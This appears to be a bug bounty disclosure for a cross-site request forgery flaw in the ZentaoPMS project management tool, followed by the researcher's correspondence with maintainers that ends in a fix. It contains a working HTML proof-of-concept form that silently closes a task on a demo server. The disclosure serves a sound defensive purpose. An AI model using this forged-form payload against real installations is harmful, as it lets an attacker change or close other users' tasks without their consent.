Cross-Site Request Forgery (CSRF) in easysoft/zentaopms

Valid

Reported on

Jul 28th 2021


✍️ Description

When you don't set the SameSite attribute of cookies the browsers have special act in front of this issue.(I mean set default value on it) chrome and chromium based browsers set the attribute "Lax" that mean if you do add/delete/alter operation in a get HTTP request then your site more vulnerable with CSRF attacks.

But Firefox and safari ( one of big ones ) don't set this attribute to "Lax" and set it to "none" that makes all POST and GET requests more Vulnerable to CSRF attack.

In Firefox and safari I can close/edit any project task With CSRF that users already allowed manually do it.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.zentao.pm/task-close-104.html?onlybody=yes" method="POST">
      <input type="hidden" name="status" value="closed" />
      <input type="hidden" name="comment" value="nothings&#33;&#33;&#33;&#32;&#58;&#41;&#41;&lt;br&#32;&#47;&gt;" />
      <input type="hidden" name="uid" value="6101a5cf9d997" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Here you should run PoC.html, after click on button you can see an Project task with id equals to 104 have been closed.

💥 Impact

This vulnerability is capable of close/edit any project task of any user.

We have contacted a member of the easysoft/zentaopms team and are waiting to hear back 3 years ago
Am
3 years ago

Researcher


hey easysoft team if you want any help or suggestions on these vulnerabilities, just tell me.

Am
3 years ago

Researcher


@admin

Hey man how are you today? :)

the maintainer said can't find any link related to this report:

https://github.com/easysoft/zentaopms/issues/69#issuecomment-892313848

Jamie Slome
3 years ago

I am forwarding this to Ziding to look into further. Cheers!

Z-Old
3 years ago

Hey amammad, I've sent another email to them for you.

easysoft/zentaopms maintainer
3 years ago

Hello, we have received the reports and we'll check the issue.

Am
3 years ago

Researcher


yah sure, If you want any idea for fix these vulnerabilities I can help you.

easysoft/zentaopms maintainer
3 years ago

Hello, we have received the email and will check it soon. Thanks a lot.

easysoft/zentaopms maintainer
3 years ago

We will release a patch soon.

Am
3 years ago

Researcher


Thanks for your quick fix...

can you just validate my reports until the patches release please ?

easysoft/zentaopms maintainer
3 years ago

Thanks for your reports. I am a contributor of zentaopms. If we fix it, I will notice you.

Am
3 years ago

Researcher


Hey zentaopms team, I just want to sure that you hadn't any problem, if you want any Fix suggestion tell me and be free.

xia0ta0
3 years ago

Hello amammad, I enabled the csrf protection in zentaopms. The commit can fix the vulnerability. https://github.com/easysoft/zentaopms/commit/cb40696190d69efd95df055abbd330ab2cb72008

easysoft/zentaopms maintainer validated this vulnerability 3 years ago
am0o0 has been awarded the disclosure bounty
The fix bounty is now up for grabs
easysoft/zentaopms maintainer
3 years ago

We have fix the issue in github. When we fix the issue on huntr, the system need to select the fixer to be reworded, there's only nobody to be selected. Is that ok?

Am
3 years ago

Researcher


yah it is ok, no problem.

Can you validate other CSRF Reports that i reported them in different endpoints?

Am
3 years ago

Researcher


can you give me any feedback about last comment?

Am
3 years ago

Researcher


if you have a problem with system you can use @admin in your comment to get answer from them

easysoft/zentaopms maintainer marked this as fixed with commit 5a9f7f 3 years ago
The fix bounty has been dropped
easysoft/zentaopms maintainer
3 years ago

@admin >> Can you validate other CSRF Reports that i reported them in different endpoints? Where're can I find these reports?

Am
3 years ago

Researcher


hey dear @xia0ta0 and easysoft team, if you already registered on huntr.dev you can see the content of following reports :

https://www.huntr.dev/bounties/c4c79696-4431-4eb7-a334-1e2c766de86c/ https://www.huntr.dev/bounties/20099a57-8ea8-4c11-a46b-c1796b839f9c/ https://www.huntr.dev/bounties/8f04caa0-5545-4819-996a-a4701e4753aa/ https://www.huntr.dev/bounties/5690899e-9171-40bb-895a-77d015fa946f/ https://www.huntr.dev/bounties/98001390-98be-4dd9-8cf3-0c01cd02d2c4/ https://www.huntr.dev/bounties/00986980-56e7-4b3d-87e9-7eb29b320687/ https://www.huntr.dev/bounties/1c137804-4cb5-4bcb-be2e-68c33a6e04e5/

Jamie Slome
3 years ago

@maintainer - let me know if you need further support here!

to join this conversation